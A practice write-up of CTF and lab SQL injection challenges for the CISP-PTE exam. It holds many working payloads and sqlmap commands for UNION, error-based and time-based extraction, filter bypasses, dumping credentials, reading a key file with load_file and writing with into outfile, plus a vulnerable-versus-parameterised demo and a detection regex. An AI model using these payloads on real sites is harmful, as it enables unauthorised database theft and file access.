[CISP-PTE] SQL Injection Practice Problems
1. This year's Spring Festival is different from past years
http://140.210.203.168:28881
1.1 Manual injection
The challenge states explicitly that the comment characters # and -- are filtered.
- Close the string with a single quote and work around the filtered comment characters
Closing the quote
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1=1
Echoed SQL:
select * from Article where uuid = '983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1='1'
Closing the trailing quote
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1='1
Closure successful
2. Find the column count
Try one count at a time
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,3,4,5 or 1='1
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,3,4,5,6 or 1='1
With 6 columns the query succeeds and field 2 is echoed
3. Dump the database name
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,database(),3,4,5,6 or 1='1
Database name: 2web
4. Dump the tables
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='2web'),3,4,5,6 or 1='1
Two tables found: Article, IS_KEY
5. Dump the columns of IS_KEY
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='2web' and table_name='IS_KEY'),3,4,5,6 and 1='1
Column found: haha
6. Dump the field values
http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(haha) from IS_KEY ),3,4,5,6 and 1='1
Result: key1:abcd1234
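Added example (not from the write-up): the query echoed above, `select * from Article where uuid = '...'`, rebuilt in Python on an in-memory sqlite3 database, once with the parameter spliced into the SQL text and once with a bound parameter, then exercised with the page's own `uuid=` payloads. The six column names and the seeded row are placeholders; the write-up only establishes the column count and that field 2 is echoed.

```python
import sqlite3

# Constructed stand-in for the challenge's Article table. The write-up only establishes
# that it has six columns and echoes column 2, so these column names are placeholders.
SCHEMA = ("CREATE TABLE Article (id INTEGER, uuid TEXT, title TEXT, body TEXT, "
          "author TEXT, created TEXT)")
KNOWN_UUID = "983fd952-df4e-4b63-946f-f2e6bb0327d6"
ROW = (1, KNOWN_UUID, "Spring Festival", "...", "editor", "2022-01-30")

def open_db() -> sqlite3.Connection:
    """In-memory database seeded with one article."""
    con = sqlite3.connect(":memory:")
    con.execute(SCHEMA)
    con.execute("INSERT INTO Article VALUES (?, ?, ?, ?, ?, ?)", ROW)
    return con

def lookup_vulnerable(con: sqlite3.Connection, uuid: str) -> list:
    """The pattern behind index.php?uuid=...: the parameter is spliced into the SQL text."""
    return con.execute(f"select * from Article where uuid = '{uuid}'").fetchall()

def lookup_safe(con: sqlite3.Connection, uuid: str) -> list:
    """Same query with a bound parameter: the input is only ever a value, never syntax."""
    return con.execute("select * from Article where uuid = ?", (uuid,)).fetchall()

def probe(lookup, con: sqlite3.Connection, payload: str) -> tuple:
    """Report ('rows', n) or ('error', class name): the two symptoms the write-up watches for."""
    try:
        return ("rows", len(lookup(con, payload)))
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)

def column2_values(lookup, con: sqlite3.Connection, payload: str) -> set:
    """Values landing in the echoed column 2; the UNION probe plants the literal 2 there."""
    return {row[1] for row in lookup(con, payload)}

# The write-up's uuid= values after URL decoding: an unclosed quote (forces a syntax
# error, which is how the page spotted the injection point) and the six-column UNION probe.
UNCLOSED = KNOWN_UUID + "' and 1=1"
UNION_PROBE = KNOWN_UUID + "' union select 1,2,3,4,5,6 or 1='1"

if __name__ == "__main__":
    con = open_db()
    for name, fn in (("vulnerable", lookup_vulnerable), ("parameterised", lookup_safe)):
        print(name, "legit:", probe(fn, con, KNOWN_UUID),
              "unclosed quote:", probe(fn, con, UNCLOSED),
              "union probe:", probe(fn, con, UNION_PROBE))
```

With the bound parameter both payloads are just uuids that do not exist, so the query returns no rows and raises no error.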
1.2 Injection with sqlmap
- Detect the injection point
python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5
- Current database
python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 --current-db
- Tables
python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web --tables
- Columns
python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web -T IS_KEY --columns
- Dump the data
python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web -T IS_KEY -C "haha" --dump
2. Article publishing system
http://140.210.203.168:17111/admin.php
Injection with sqlmap
Current database
python sqlmap.py -u "http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4" --risk 3 --level 5 --current-db
Tables
python sqlmap.py -u "http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4" --risk 3 --level 5 -D 2web --tables
Columns
python sqlmap.py -u "http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4" --risk 3 --level 5 -D 2web -T users1 --columns
Dump the data
python sqlmap.py -u "http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4" --risk 3 --level 5 -D 2web -T users1 -C "XremarkX4354" --dump
3. Article publishing system 2
Inject with sqlmap and run an SQL shell
http://118.195.198.108:20000
Register a user
Publish an article, capture the request and save it as sql.txt
Current database with sqlmap
python sqlmap.py -r sql.txt --risk 3 --level 5 --current-db
Tables
python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web --tables
Columns
python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web -T users1 --columns
Dump the data
python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web -T users1 -C "username,ox3a,password" --dump
The field values cannot be dumped this way
Information gathered so far: database 2web, table users1, columns username and password
Run an SQL shell through sqlmap
python sqlmap.py -r sql.txt --sql-shell
select * from 2web.users1 limit 1 or select * from 2web.users1 where username='admin'
Or run the SQL directly through sqlmap
python sqlmap.py -r sql.txt --sql-query="select * from 2web.users1 limit 1"
4. [Chapter 1: Web Basics] SQL Injection-1
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81
UNION-based injection
Closure
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 #
# is filtered
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 %23
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 --+
%23 and --+ are not filtered; closure successful
Column count
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' order by 30 --+
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' order by 3 --+
The column count is 3
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' union select 1,2,3 --+
Confirms that the column count is 3
Echo position
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,2,3 --+
Database
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,database(),3 --+
Database name: note
Tables
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='note'),3 --+
Two tables: fl4g, notes
Columns
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='note' and table_name='fl4g'),3 --+
Column name: fllllag
Field value
http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(fllllag) from fl4g),3 and 1=1 --+
Flag: n1book{union_select_is_so_cool}
5. sqli-labs 1-15
updatexml
extractvalue
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1
Closure
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1 and 1=1 %23
# is filtered
Error-based injection: database
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,database()),1) %23
Tables
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),1) %23
Only one row is returned per query, so use limit to walk the tables one at a time
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1) %23
emails
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 2,1)),1) %23
uagents
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1)),1) %23
users
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 1,1)),1) %23
referers
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 4,1)),1) %23
Empty, so there are only four tables
Columns
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)),1) %23
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1)),1) %23
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1)),1) %23
Three columns: id, username, password
Field contents
http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users limit 0,1)),1) %23
XPATH syntax error: '~Dumb:Dumb,Angelina:I-kill-you,D'
The echoed content is truncated and the result is incomplete; see the reference document
https://www.wolai.com/ctfhub/qXx5vurg8fRgasaZAVDo8W
The MID() function extracts characters from a text field: SELECT MID(column_name,start[,length]) FROM table_name;
- Less-1 string-type injection
http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-1/?id=1' order by 5 --+
- Less-2 numeric-type injection
http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-2/?id=1 order by 5
- Less-3 ') closure
http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-3/?id=1') --+
- Less-4 ") closure
http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-4/?id=1") --+
- Less-5 error-based injection
http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-5/?id=1' and updatexml(1,concat(1,database()),1) --+
http://node2.anna.nssctf.cn:28656/Less-5/?id=1' and updatexml(1,concat(0x7e,(select email_id from emails limit 8,1)),1) --+
- Less-6 error-based injection, " closure
http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-6/?id=1" and updatexml(1,concat(0x7e,database()),1)--+
- Less-7 outfile
Less-7/?id=-1' union select 1,2,@@datadir -- # get the data directory path
Less-7/?id=-1' union select 1,2,@@basedir -- # get the installation path
Less-7/?id=1')) union select 1,2,3 into outfile "C:\phpStudy\WWW\sqli\Less-7\test.txt" -- #
sqlmap --sql-shell
- Less-8 boolean-based blind, sqlmap
- Less-9 time-based blind, sqlmap
?id=1' and sleep(5) -- -   # 5 s delay
?id=1'' and sleep(5) -- -
?id=1 and sleep(5) -- -
?id=1') and sleep(5) -- -
?id=1'') and sleep(5) -- -
?id=1' and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)='i',sleep(3),1)-- -
- Less-10 time-based blind, sqlmap
?id=1" and sleep(5) --+
- Less-11 error-based injection
' and updatexml(1,concat(0x7e,database()),0) #
- Less-12 closure check
") union select database(),2 #
- Less-13 closure check
1') or 1=1 #
1') and updatexml(1,concat(0x7e,(select database()),0x7e),1)#
- Less-14 closure check
1" or 1=1 #
1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#
6. Wide-byte injection: [极客大挑战 2019]HardSQL 1
http://8c4f169a-d2ef-4cdd-bd7f-74431c549dcc.node4.buuoj.cn:81/check.php?username=1&password=1%27or(updatexml(1,concat(0x7e,database()),1))%23
7. Reading files via SQL
http://192.168.213.22:81
Read the /tmp/360/key file through the SQL injection vulnerability; the answer is in the file.
Confirming the injection point
http://192.168.213.22:81/vulnerabilities/fu1.php?id=1'
Error, so an injection point exists; echoed SQL: select * from article where id= ('1'')
Closure
--+ and # are both filtered
;%00 closes successfully
http://192.168.213.22:81/vulnerabilities/fu1.php?id=1');%00
Or (spaces are filtered; use /**/ or %0a instead)
http://192.168.213.22:81/vulnerabilities/fu1.php?id=1') /**/or/**/1=('1
Column count
http://192.168.213.22:81/vulnerabilities/fu1.php?id=1') /**/order/**/by/**/4;%00
UNION echo
union is filtered; bypass by double-writing it
http://192.168.213.22:81/vulnerabilities/fu1.php?id=-1') /**/ununionion/**/select/**/1,2,3,4;%00
Read the key file: key:8b3h4a7v
http://192.168.213.22:81/vulnerabilities/fu1.php?id=-1') /**/ununionion/**/select/**/1,2,3,load_file("/tmp/360/key");%00
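Added example (not from the write-up) covering sections 5 and 7 from the detection side: a Python normaliser plus signature matcher for the request shapes seen above. It undoes the evasions these challenges exercise (URL encoding, `--+`/`%23` terminators, `/**/` and `%0a` in place of spaces, the `;%00` terminator, the double-written `ununionion`) before matching UNION, updatexml/extractvalue, sleep, information_schema and load_file/outfile. The request targets are constructed from the payload shapes above, and the signature names are my own.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the techniques in the write-up: union dumping, error-based extraction
# (updatexml/extractvalue), time-based blind (sleep), schema enumeration, file access, terminators.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "error_based": re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I),
    "time_based": re.compile(r"\bsleep\s*\(", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
    "file_access": re.compile(r"\bload_file\s*\(|\binto\s+outfile\b", re.I),
    "terminator": re.compile(r"--\s|#|;\x00"),
}
# Keywords a naive blacklist deletes; 'ununionion' survives one deletion pass as 'union'.
DOUBLE_WRITE_KEYWORDS = ("union", "select")

def normalize(raw: str) -> str:
    """Undo the encoding and comment tricks seen above so the signatures can match."""
    s = unquote_plus(unquote_plus(raw))           # %27->' %23-># %0a->LF %00->NUL, '+'->space
    s = re.sub(r"/\*.*?\*/", " ", s)              # /**/ stands in for a filtered space
    return re.sub(r"[ \t\r\n\x0b\x0c]+", " ", s)  # collapse whitespace; NUL is kept as a signal

def peel_keyword(s: str, kw: str) -> str:
    """Replay a single-pass blacklist deletion of kw, which a double-write bypass relies on."""
    return re.sub(kw, "", s, flags=re.I)

def detect(request_target: str) -> list:
    """Return the sorted signature names that fire for one request path plus query string."""
    s = normalize(request_target)
    direct = {n for n, rx in SIGNATURES.items() if rx.search(s)}
    peeled = {n for kw in DOUBLE_WRITE_KEYWORDS
              for n, rx in SIGNATURES.items() if rx.search(peel_keyword(s, kw))}
    hits = direct | peeled
    if "union_select" in peeled and "union_select" not in direct:
        hits.add("double_write_bypass")  # the keyword only appeared after peeling
    return sorted(hits)

# Constructed request targets mirroring the payload shapes above; not captured traffic.
SAMPLE_REQUESTS = [
    "/index.php?id=1",
    "/index.php?id=-1%27%20union%20select%201,database(),3%20--+",
    "/Less-1/?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20table_name%20from"
    "%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1)),1)%20%23",
    "/fu1.php?id=-1%27)%20/**/ununionion/**/select/**/1,2,3,load_file(%22/tmp/360/key%22);%00",
    "/Less-9/?id=1%27%20and%20sleep(5)%20--%20-",
    "/search.php?q=union+station+select+committee",  # benign text containing both words
]
if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        print(f"{target[:58]:<58} {detect(target)}")
```

The last sample shows why the union signature requires `select` to follow `union` directly: ordinary text containing both words does not fire.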